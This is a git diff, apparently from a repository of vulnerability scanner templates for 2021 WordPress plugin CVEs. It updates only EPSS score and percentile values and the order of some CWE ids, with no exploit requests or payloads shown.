a/http/cves/2021/CVE-2021-24452.yaml b/http/cves/2021/CVE-2021-24452.yaml index 6f104e82f8..0454093e04 100644 --- a/http/cves/2021/CVE-2021-24452.yaml +++ b/http/cves/2021/CVE-2021-24452.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-24452 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40941 + epss-percentile: 0.40964 cpe: cpe:2.3:a:boldgrid:w3_total_cache:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24472.yaml b/http/cves/2021/CVE-2021-24472.yaml index fb06530984..7f7e2336ec 100644 --- a/http/cves/2021/CVE-2021-24472.yaml +++ b/http/cves/2021/CVE-2021-24472.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-24472 cwe-id: CWE-918 epss-score: 0.0292 - epss-percentile: 0.89686 + epss-percentile: 0.89692 cpe: cpe:2.3:a:qantumthemes:kentharadio:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24488.yaml b/http/cves/2021/CVE-2021-24488.yaml index 8182651fd7..0d3baecb5a 100644 --- a/http/cves/2021/CVE-2021-24488.yaml +++ b/http/cves/2021/CVE-2021-24488.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-24488 cwe-id: CWE-79 epss-score: 0.00302 - epss-percentile: 0.66198 + epss-percentile: 0.66232 cpe: cpe:2.3:a:pickplugins:post_grid:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24495.yaml b/http/cves/2021/CVE-2021-24495.yaml index 148e8bae60..2b4e4077f5 100644 --- a/http/cves/2021/CVE-2021-24495.yaml +++ b/http/cves/2021/CVE-2021-24495.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-24495 cwe-id: CWE-79 epss-score: 0.00116 - epss-percentile: 0.45134 + epss-percentile: 0.4515 cpe: cpe:2.3:a:marmoset:marmoset_viewer:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24498.yaml b/http/cves/2021/CVE-2021-24498.yaml index 594cf42e0d..2d4f3bf68e 100644 --- a/http/cves/2021/CVE-2021-24498.yaml +++ b/http/cves/2021/CVE-2021-24498.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-24498 cwe-id: CWE-79 epss-score: 0.00188 - epss-percentile: 0.56085 + epss-percentile: 0.5611 cpe: cpe:2.3:a:dwbooster:calendar_event_multi_view:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24499.yaml b/http/cves/2021/CVE-2021-24499.yaml index 90d69cfcaa..60240ded7c 100644 --- a/http/cves/2021/CVE-2021-24499.yaml +++ b/http/cves/2021/CVE-2021-24499.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-24499 cwe-id: CWE-434 epss-score: 0.18031 - epss-percentile: 0.95593 + epss-percentile: 0.95596 cpe: cpe:2.3:a:amentotech:workreap:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24510.yaml b/http/cves/2021/CVE-2021-24510.yaml index 87c5dbabf2..9f110ebcdb 100644 --- a/http/cves/2021/CVE-2021-24510.yaml +++ b/http/cves/2021/CVE-2021-24510.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-24510 cwe-id: CWE-79 epss-score: 0.00143 - epss-percentile: 0.49933 + epss-percentile: 0.49952 cpe: cpe:2.3:a:mf_gig_calendar_project:mf_gig_calendar:*:*:*:*:wordpress:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24554.yaml b/http/cves/2021/CVE-2021-24554.yaml index f8c7cb0cb4..bcc2447745 100644 --- a/http/cves/2021/CVE-2021-24554.yaml +++ b/http/cves/2021/CVE-2021-24554.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-24554 cwe-id: CWE-89 epss-score: 0.15547 - epss-percentile: 0.95304 + epss-percentile: 0.95303 cpe: cpe:2.3:a:freelancetoindia:paytm-pay:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24627.yaml b/http/cves/2021/CVE-2021-24627.yaml index fc768c1c9e..b32a414d8a 100644 --- a/http/cves/2021/CVE-2021-24627.yaml +++ b/http/cves/2021/CVE-2021-24627.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-24627 cwe-id: CWE-89 epss-score: 0.13507 - epss-percentile: 0.94976 + epss-percentile: 0.9498 cpe: cpe:2.3:a:g_auto-hyperlink_project:g_auto-hyperlink:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24647.yaml b/http/cves/2021/CVE-2021-24647.yaml index 6c74ae3f7c..0651ae7cae 100644 --- a/http/cves/2021/CVE-2021-24647.yaml +++ b/http/cves/2021/CVE-2021-24647.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-24647 cwe-id: CWE-287 epss-score: 0.2135 - epss-percentile: 0.95883 + epss-percentile: 0.95885 cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:* metadata: verified: "true" diff --git a/http/cves/2021/CVE-2021-24666.yaml b/http/cves/2021/CVE-2021-24666.yaml index 0376b16975..0b12f5923b 100644 --- a/http/cves/2021/CVE-2021-24666.yaml +++ b/http/cves/2021/CVE-2021-24666.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-24666 cwe-id: CWE-89 epss-score: 0.23542 - epss-percentile: 0.96031 + epss-percentile: 0.96034 cpe: cpe:2.3:a:podlove:podlove_podcast_publisher:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24731.yaml b/http/cves/2021/CVE-2021-24731.yaml index ad9f2de1b1..5c37eff875 100644 --- a/http/cves/2021/CVE-2021-24731.yaml +++ b/http/cves/2021/CVE-2021-24731.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-24731 cwe-id: CWE-89 epss-score: 0.19524 - epss-percentile: 0.95726 + epss-percentile: 0.95729 cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:* metadata: verified: "true" diff --git a/http/cves/2021/CVE-2021-24746.yaml b/http/cves/2021/CVE-2021-24746.yaml index 19a6a5b5ed..571538cc74 100644 --- a/http/cves/2021/CVE-2021-24746.yaml +++ b/http/cves/2021/CVE-2021-24746.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-24746 cwe-id: CWE-79 epss-score: 0.00106 - epss-percentile: 0.42946 + epss-percentile: 0.42969 cpe: cpe:2.3:a:heateor:sassy_social_share:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24750.yaml b/http/cves/2021/CVE-2021-24750.yaml index 92dc03fd43..605430c088 100644 --- a/http/cves/2021/CVE-2021-24750.yaml +++ b/http/cves/2021/CVE-2021-24750.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-24750 cwe-id: CWE-89 epss-score: 0.00791 - epss-percentile: 0.79619 + epss-percentile: 0.7963 cpe: cpe:2.3:a:wp_visitor_statistics_\(real_time_traffic\)_project:wp_visitor_statistics_\(real_time_traffic\):*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24762.yaml b/http/cves/2021/CVE-2021-24762.yaml index f68fd07b7f..10a8a90b9b 100644 --- a/http/cves/2021/CVE-2021-24762.yaml +++ b/http/cves/2021/CVE-2021-24762.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-24762 cwe-id: CWE-89 epss-score: 0.0193 - epss-percentile: 0.87332 + epss-percentile: 0.87337 cpe: cpe:2.3:a:getperfectsurvey:perfect_survey:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24791.yaml b/http/cves/2021/CVE-2021-24791.yaml index 10e1f28c65..d3346b4e71 100644 --- a/http/cves/2021/CVE-2021-24791.yaml +++ b/http/cves/2021/CVE-2021-24791.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-24791 cwe-id: CWE-89 epss-score: 0.13959 - epss-percentile: 0.95043 + epss-percentile: 0.95047 cpe: cpe:2.3:a:draftpress:header_footer_code_manager:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24827.yaml b/http/cves/2021/CVE-2021-24827.yaml index acbe9de7f8..4e20ab5df0 100644 --- a/http/cves/2021/CVE-2021-24827.yaml +++ b/http/cves/2021/CVE-2021-24827.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-24827 cwe-id: CWE-89 epss-score: 0.10951 - epss-percentile: 0.94494 + epss-percentile: 0.94498 cpe: cpe:2.3:a:asgaros:asgaros_forum:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24838.yaml b/http/cves/2021/CVE-2021-24838.yaml index c8874c5fe3..b313806bd1 100644 --- a/http/cves/2021/CVE-2021-24838.yaml +++ b/http/cves/2021/CVE-2021-24838.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-24838 cwe-id: CWE-601 epss-score: 0.00106 - epss-percentile: 0.42946 + epss-percentile: 0.42969 cpe: cpe:2.3:a:bologer:anycomment:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24862.yaml b/http/cves/2021/CVE-2021-24862.yaml index 0f8edbc9a3..80f34c5de1 100644 --- a/http/cves/2021/CVE-2021-24862.yaml +++ b/http/cves/2021/CVE-2021-24862.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-24862 cwe-id: CWE-89 epss-score: 0.68026 - epss-percentile: 0.97604 + epss-percentile: 0.97607 cpe: cpe:2.3:a:metagauss:registrationmagic:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24875.yaml b/http/cves/2021/CVE-2021-24875.yaml index 67293c9393..267751e0aa 100644 --- a/http/cves/2021/CVE-2021-24875.yaml +++ b/http/cves/2021/CVE-2021-24875.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-24875 cwe-id: CWE-79 epss-score: 0.00143 - epss-percentile: 0.49933 + epss-percentile: 0.49952 cpe: cpe:2.3:a:implecode:ecommerce_product_catalog:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24891.yaml b/http/cves/2021/CVE-2021-24891.yaml index 8a6c9c5baa..1e20f072af 100644 --- a/http/cves/2021/CVE-2021-24891.yaml +++ b/http/cves/2021/CVE-2021-24891.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-24891 cwe-id: CWE-79 epss-score: 0.00116 - epss-percentile: 0.45134 + epss-percentile: 0.4515 cpe: cpe:2.3:a:elementor:website_builder:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24910.yaml b/http/cves/2021/CVE-2021-24910.yaml index 73d8327766..6638bc909b 100644 --- a/http/cves/2021/CVE-2021-24910.yaml +++ b/http/cves/2021/CVE-2021-24910.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-24910 cwe-id: CWE-79 epss-score: 0.00097 - epss-percentile: 0.40317 + epss-percentile: 0.40339 cpe: cpe:2.3:a:transposh:transposh_wordpress_translation:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24915.yaml b/http/cves/2021/CVE-2021-24915.yaml index 07a1cadc6c..dbee0ffb52 100644 --- a/http/cves/2021/CVE-2021-24915.yaml +++ b/http/cves/2021/CVE-2021-24915.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-24915 cwe-id: CWE-89 epss-score: 0.21189 - epss-percentile: 0.95873 + epss-percentile: 0.95876 cpe: cpe:2.3:a:contest_gallery:contest_gallery:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24917.yaml b/http/cves/2021/CVE-2021-24917.yaml index a62aea7b08..cd989e6ff1 100644 --- a/http/cves/2021/CVE-2021-24917.yaml +++ b/http/cves/2021/CVE-2021-24917.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-24917 cwe-id: CWE-863 epss-score: 0.04442 - epss-percentile: 0.9145 + epss-percentile: 0.9146 cpe: cpe:2.3:a:wpserveur:wps_hide_login:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24926.yaml b/http/cves/2021/CVE-2021-24926.yaml index 4bf8ca9311..415f6cb82b 100644 --- a/http/cves/2021/CVE-2021-24926.yaml +++ b/http/cves/2021/CVE-2021-24926.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-24926 cwe-id: CWE-79 epss-score: 0.00171 - epss-percentile: 0.54069 + epss-percentile: 0.54094 cpe: cpe:2.3:a:domaincheckplugin:domain_check:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24931.yaml b/http/cves/2021/CVE-2021-24931.yaml index 9b36606072..0b3e60c53f 100644 --- a/http/cves/2021/CVE-2021-24931.yaml +++ b/http/cves/2021/CVE-2021-24931.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-24931 cwe-id: CWE-89 epss-score: 0.61642 - epss-percentile: 0.97446 + epss-percentile: 0.97448 cpe: cpe:2.3:a:ays-pro:secure_copy_content_protection_and_content_locking:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24940.yaml b/http/cves/2021/CVE-2021-24940.yaml index 8a23e0b320..4b63ca8eae 100644 --- a/http/cves/2021/CVE-2021-24940.yaml +++ b/http/cves/2021/CVE-2021-24940.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-24940 cwe-id: CWE-79 epss-score: 0.00106 - epss-percentile: 0.42946 + epss-percentile: 0.42969 cpe: cpe:2.3:a:woocommerce:persian-woocommerce:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24946.yaml b/http/cves/2021/CVE-2021-24946.yaml index 2768b4e280..7b78ddc4ac 100644 --- a/http/cves/2021/CVE-2021-24946.yaml +++ b/http/cves/2021/CVE-2021-24946.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-24946 cwe-id: CWE-89 epss-score: 0.11946 - epss-percentile: 0.94728 + epss-percentile: 0.9473 cpe: cpe:2.3:a:webnus:modern_events_calendar_lite:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24947.yaml b/http/cves/2021/CVE-2021-24947.yaml index 5c6af502d2..959a9353ea 100644 --- a/http/cves/2021/CVE-2021-24947.yaml +++ b/http/cves/2021/CVE-2021-24947.yaml @@ -14,9 +14,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2021-24947 - cwe-id: CWE-352,CWE-863 + cwe-id: CWE-863,CWE-352 epss-score: 0.00291 - epss-percentile: 0.65647 + epss-percentile: 0.65683 cpe: cpe:2.3:a:thinkupthemes:responsive_vector_maps:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24956.yaml b/http/cves/2021/CVE-2021-24956.yaml index 36d3a03b10..3d758fa9b5 100644 --- a/http/cves/2021/CVE-2021-24956.yaml +++ b/http/cves/2021/CVE-2021-24956.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-24956 cwe-id: CWE-79 epss-score: 0.00106 - epss-percentile: 0.42946 + epss-percentile: 0.42969 cpe: cpe:2.3:a:adenion:blog2social:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24970.yaml b/http/cves/2021/CVE-2021-24970.yaml index b59485ee1a..f52d9a730f 100644 --- a/http/cves/2021/CVE-2021-24970.yaml +++ b/http/cves/2021/CVE-2021-24970.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-24970 cwe-id: CWE-22 epss-score: 0.03639 - epss-percentile: 0.90635 + epss-percentile: 0.90641 cpe: cpe:2.3:a:plugins360:all-in-one_video_gallery:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24979.yaml b/http/cves/2021/CVE-2021-24979.yaml index 4b9b049e02..24b5d15a60 100644 --- a/http/cves/2021/CVE-2021-24979.yaml +++ b/http/cves/2021/CVE-2021-24979.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-24979 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.4099 + epss-percentile: 0.41014 cpe: cpe:2.3:a:strangerstudios:paid_memberships_pro:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24987.yaml b/http/cves/2021/CVE-2021-24987.yaml index 831b6013af..3efb49ccbb 100644 --- a/http/cves/2021/CVE-2021-24987.yaml +++ b/http/cves/2021/CVE-2021-24987.yaml @@ -15,8 +15,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-24987 cwe-id: CWE-79 - epss-score: 0.00099 - epss-percentile: 0.40777 + epss-score: 0.00086 + epss-percentile: 0.36026 cpe: cpe:2.3:a:heateor:super_socializer:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24991.yaml b/http/cves/2021/CVE-2021-24991.yaml index c9a99fffc7..3c9f1840dc 100644 --- a/http/cves/2021/CVE-2021-24991.yaml +++ b/http/cves/2021/CVE-2021-24991.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-24991 cwe-id: CWE-79 epss-score: 0.00069 - epss-percentile: 0.29045 + epss-percentile: 0.29051 cpe: cpe:2.3:a:wpovernight:woocommerce_pdf_invoices\&_packing_slips:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24997.yaml b/http/cves/2021/CVE-2021-24997.yaml index 9f63a854a7..b0c95d16e3 100644 --- a/http/cves/2021/CVE-2021-24997.yaml +++ b/http/cves/2021/CVE-2021-24997.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-24997 cwe-id: CWE-862 epss-score: 0.00224 - epss-percentile: 0.60573 + epss-percentile: 0.60604 cpe: cpe:2.3:a:wp-guppy:wp_guppy:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-25003.yaml b/http/cves/2021/CVE-2021-25003.yaml index ff0918eacf..d06e032844 100644 --- a/http/cves/2021/CVE-2021-25003.yaml +++ b/http/cves/2021/CVE-2021-25003.yaml @@ -16,9 +16,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-25003 - cwe-id: CWE-434,CWE-94 + cwe-id: CWE-94,CWE-434 epss-score: 0.61252 - epss-percentile: 0.9744 + epss-percentile: 0.97441 cpe: cpe:2.3:a:wptaskforce:wpcargo_track_\&_trace:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-25008.yaml b/http/cves/2021/CVE-2021-25008.yaml index 4b7c973fec..ebc1e0bc83 100644 --- a/http/cves/2021/CVE-2021-25008.yaml +++ b/http/cves/2021/CVE-2021-25008.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-25008 cwe-id: CWE-79 epss-score: 0.00106 - epss-percentile: 0.42946 + epss-percentile: 0.42969 cpe: cpe:2.3:a:codesnippets:code_snippets:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-25016.yaml b/http/cves/2021/CVE-2021-25016.yaml index 9423994bdf..76125af8b9 100644 --- a/http/cves/2021/CVE-2021-25016.yaml +++ b/http/cves/2021/CVE-2021-25016.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-25016 cwe-id: CWE-79 epss-score: 0.00106 - epss-percentile: 0.42946 + epss-percentile: 0.42969 cpe: cpe:2.3:a:premio:chaty:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-25028.yaml b/http/cves/2021/CVE-2021-25028.yaml index b54b638818..1c5a51b90f 100644 --- a/http/cves/2021/CVE-2021-25028.yaml +++ b/http/cves/2021/CVE-2021-25028.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-25028 cwe-id: CWE-601 epss-score: 0.00106 - epss-percentile: 0.42946 + epss-percentile: 0.42969 cpe: cpe:2.3:a:tri:event_tickets:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-25033.yaml b/http/cves/2021/CVE-2021-25033.yaml index e82bf12e0b..ee78d2ff0b 100644 --- a/http/cves/2021/CVE-2021-25033.yaml +++ b/http/cves/2021/CVE-2021-25033.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-25033 cwe-id: CWE-601 epss-score: 0.001 - epss-percentile: 0.4099 + epss-percentile: 0.41014 cpe: cpe:2.3:a:noptin:noptin:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-25052.yaml b/http/cves/2021/CVE-2021-25052.yaml index dcc1035295..0938aecbf5 100644 --- a/http/cves/2021/CVE-2021-25052.yaml +++ b/http/cves/2021/CVE-2021-25052.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-25052 cwe-id: CWE-352 epss-score: 0.02096 - epss-percentile: 0.87905 + epss-percentile: 0.87912 cpe: cpe:2.3:a:wow-company:button_generator:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-25055.yaml b/http/cves/2021/CVE-2021-25055.yaml index 16027cbfcf..911a160298 100644 --- a/http/cves/2021/CVE-2021-25055.yaml +++ b/http/cves/2021/CVE-2021-25055.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-25055 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.4099 + epss-percentile: 0.41014 cpe: cpe:2.3:a:feedwordpress_project:feedwordpress:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-25063.yaml b/http/cves/2021/CVE-2021-25063.yaml index 5373f94b63..2872c75db0 100644 --- a/http/cves/2021/CVE-2021-25063.yaml +++ b/http/cves/2021/CVE-2021-25063.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-25063 cwe-id: CWE-79 epss-score: 0.00106 - epss-percentile: 0.42946 + epss-percentile: 0.42969 cpe: cpe:2.3:a:cf7skins:contact_form_7_skins:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-25065.yaml b/http/cves/2021/CVE-2021-25065.yaml index fec99f6ab5..8ea3d512d1 100644 --- a/http/cves/2021/CVE-2021-25065.yaml +++ b/http/cves/2021/CVE-2021-25065.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-25065 cwe-id: CWE-79 epss-score: 0.00069 - epss-percentile: 0.28838 + epss-percentile: 0.28844 cpe: cpe:2.3:a:smashballoon:smash_balloon_social_post_feed:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-25067.yaml b/http/cves/2021/CVE-2021-25067.yaml index 51b6aa907b..1f96d1bb4d 100644 --- a/http/cves/2021/CVE-2021-25067.yaml +++ b/http/cves/2021/CVE-2021-25067.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-25067 cwe-id: CWE-79 epss-score: 0.00069 - epss-percentile: 0.28838 + epss-percentile: 0.28844 cpe: cpe:2.3:a:pluginops:landing_page:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-25074.yaml b/http/cves/2021/CVE-2021-25074.yaml index 06bf399f02..995b9cdfe5 100644 --- a/http/cves/2021/CVE-2021-25074.yaml +++ b/http/cves/2021/CVE-2021-25074.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-25074 cwe-id: CWE-601 epss-score: 0.00106 - epss-percentile: 0.42946 + epss-percentile: 0.42969 cpe: cpe:2.3:a:webp_converter_for_media_project:webp_converter_for_media:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-25075.yaml b/http/cves/2021/CVE-2021-25075.yaml index 7cc9a44d19..985f7e8675 100644 --- a/http/cves/2021/CVE-2021-25075.yaml +++ b/http/cves/2021/CVE-2021-25075.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-25075 cwe-id: CWE-862 epss-score: 0.00071 - epss-percentile: 0.29498 + epss-percentile: 0.29503 cpe: cpe:2.3:a:wpdevart:duplicate_page_or_post:*:*:*:*:*:wordpress:*:* metadata: max-request: 3 diff --git a/http/cves/2021/CVE-2021-25078.yaml b/http/cves/2021/CVE-2021-25078.yaml index ea3e8650af..0db7faf8f6 100644 --- a/http/cves/2021/CVE-2021-25078.yaml +++ b/http/cves/2021/CVE-2021-25078.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-25078 cwe-id: CWE-79 epss-score: 0.00382 - epss-percentile: 0.70037 + epss-percentile: 0.70065 cpe: cpe:2.3:a:wpaffiliatemanager:affiliates_manager:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-25079.yaml b/http/cves/2021/CVE-2021-25079.yaml index 339a35cce8..e49d3ab264 100644 --- a/http/cves/2021/CVE-2021-25079.yaml +++ b/http/cves/2021/CVE-2021-25079.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-25079 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.4099 + epss-percentile: 0.41014 cpe: cpe:2.3:a:crmperks:contact_form_entries:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-25085.yaml b/http/cves/2021/CVE-2021-25085.yaml index 3d81b84d9a..4bc1db8fa1 100644 --- a/http/cves/2021/CVE-2021-25085.yaml +++ b/http/cves/2021/CVE-2021-25085.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-25085 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.4099 + epss-percentile: 0.41014 cpe: cpe:2.3:a:pluginus:woocommerce_products_filter:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-25099.yaml b/http/cves/2021/CVE-2021-25099.yaml index e1a1235786..9f48390898 100644 --- a/http/cves/2021/CVE-2021-25099.yaml +++ b/http/cves/2021/CVE-2021-25099.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-25099 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.4099 + epss-percentile: 0.41014 cpe: cpe:2.3:a:givewp:givewp:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-25104.yaml b/http/cves/2021/CVE-2021-25104.yaml index 90a4249493..8443089f50 100644 --- a/http/cves/2021/CVE-2021-25104.yaml +++ b/http/cves/2021/CVE-2021-25104.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-25104 cwe-id: CWE-79 epss-score: 0.0012 - epss-percentile: 0.45946 + epss-percentile: 0.4596 cpe: cpe:2.3:a:oceanwp:ocean_extra:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-25111.yaml b/http/cves/2021/CVE-2021-25111.yaml index 111eba84e5..c07bcc1b76 100644 --- a/http/cves/2021/CVE-2021-25111.yaml +++ b/http/cves/2021/CVE-2021-25111.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-25111 cwe-id: CWE-601 epss-score: 0.00141 - epss-percentile: 0.49648 + epss-percentile: 0.49666 cpe: cpe:2.3:a:english_wordpress_admin_project:english_wordpress_admin:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-25112.yaml b/http/cves/2021/CVE-2021-25112.yaml index dae0bfff7e..0edbe23f71 100644 --- a/http/cves/2021/CVE-2021-25112.yaml +++ b/http/cves/2021/CVE-2021-25112.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-25112 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.4099 + epss-percentile: 0.41014 cpe: cpe:2.3:a:i-plugins:whmcs_bridge:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-25114.yaml b/http/cves/2021/CVE-2021-25114.yaml index 062bcd52e0..9a0b08b473 100644 --- a/http/cves/2021/CVE-2021-25114.yaml +++ b/http/cves/2021/CVE-2021-25114.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-25114 cwe-id: CWE-89 epss-score: 0.04964 - epss-percentile: 0.91926 + epss-percentile: 0.91938 cpe: cpe:2.3:a:strangerstudios:paid_memberships_pro:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-25118.yaml b/http/cves/2021/CVE-2021-25118.yaml index 5a87d55c08..85e833cf2a 100644 --- a/http/cves/2021/CVE-2021-25118.yaml +++ b/http/cves/2021/CVE-2021-25118.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-25118 cwe-id: CWE-200 epss-score: 0.00155 - epss-percentile: 0.5176 + epss-percentile: 0.51783 cpe: cpe:2.3:a:yoast:yoast_seo:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-25120.yaml b/http/cves/2021/CVE-2021-25120.yaml index 8a1301417b..520bf532b8 100644 --- a/http/cves/2021/CVE-2021-25120.yaml +++ 